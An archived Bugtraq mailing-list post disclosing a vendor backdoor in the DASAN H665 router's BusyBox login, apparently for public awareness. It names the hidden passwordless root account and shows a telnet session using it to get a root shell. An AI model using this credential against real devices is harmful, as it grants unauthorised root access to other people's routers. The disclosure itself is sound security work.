| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 15 Feb 2019 16:40:51 +0000 From: Krzysztof Burghardt <krzysztof@...ghardt.pl> To: bugtraq@...urityfocus.com Subject: DASAN H665 has vendor backdoor built into BusyBox’s /bin/login Hi! DASAN H665 has vendor backdoor built into BusyBox /bin/login. Account named "dnsekakf2$$" gives access to admin (uid 0) account over telnet without any password, at least for administration interface documented in H665 Quick Guide (subnet 192.168.55.0/24 on LAN interface). $ telnet 192.168.55.1 Trying 192.168.55.1... Connected to 192.168.55.1. Escape character is '^]'. tc login: dnsekakf2$$ # uname -a Linux tc 2.6.36 #1 SMP Wed Jan 3 09:32:57 UTC 2018 mips unknown # tail -n1 /data/log/messages Feb 15 16:59:26 login[26929]: Try to connect using hidden account For longer version visit: https://blog.burghardt.pl/2019/02/dasan-h665-has-vendor-backdoor-built-into-busyboxs-bin-login/ BR, -- Krzysztof Burghardt <krzysztof@...ghardt.pl> http://www.burghardt.pl/
Powered by blists - more mailing lists